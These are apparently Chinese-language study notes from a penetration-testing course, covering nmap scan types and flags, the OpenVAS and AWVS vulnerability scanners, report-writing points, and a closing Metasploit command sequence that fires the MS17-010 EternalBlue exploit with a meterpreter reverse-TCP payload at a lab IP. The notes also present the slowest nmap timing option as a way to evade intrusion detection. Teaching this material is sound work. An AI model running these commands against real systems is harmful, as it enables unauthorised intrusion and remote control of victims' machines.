关于扫描
1、资产发现
资产整理,发现,收集 联网设备、主机、服务器、各种服务等
主机发现 有哪些主机在线,IP地址 端口扫描 确定在线主机开启端口---端口上使用的服务 开启的端口、端口上的服务
2、nmap
用处:可以跨网段扫描
参数
-sP/-sn 不进行端口扫描 -p 指定端口 -p 80 -p 1-80 -p 80,3389,8080 -p 1-65535 -p- -sT TCP全连接扫描 建立完整的三次握手 nmap 172.16.13.1 -sT -sS SYN半连接扫描 只进行三次握手的前两次 nmap 172.16.13.1 -p 80 -sS 隐蔽扫描 -sN Null扫描 标志位全为0 -sX Xmas扫描 -sF Fin扫描 -sV 显示服务的详细版本 nmap -sV 172.16.13.1 -p 80 -sT -O 获取操作系统类型(不太准确) -oN/-oX 保存扫描结果,txt/xml xpath 自学 nmap -oN name -p 80 -A 全面扫描 nmap -p- -A 127.0.0.1 -T0 ~ -T5 时序选项(扫描速度 T0最慢-用于IDS逃避,默认T3)
3、漏洞扫描
Web漏洞扫描
OpenVAS(扫描操作系统、也可以对网站扫描)
Configuration -->Targets
Scans -->Tasks
AWVS(扫描网站)
爬行网站目录
asp、.net、php
关于漏洞
漏洞风险等级
高危、中危、低危、信息泄露
漏洞扫描
漏洞危害
前半部分、后半部分(后半部分---自由发挥)
修复建议
前半部分、后半部分
MSF
kali下直接 msfconsole msfconsole search MS17-010 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set RHOSTS 192.168.1.143 //目标靶机ip set LHOST 192.168.1.142 //本机IP exploit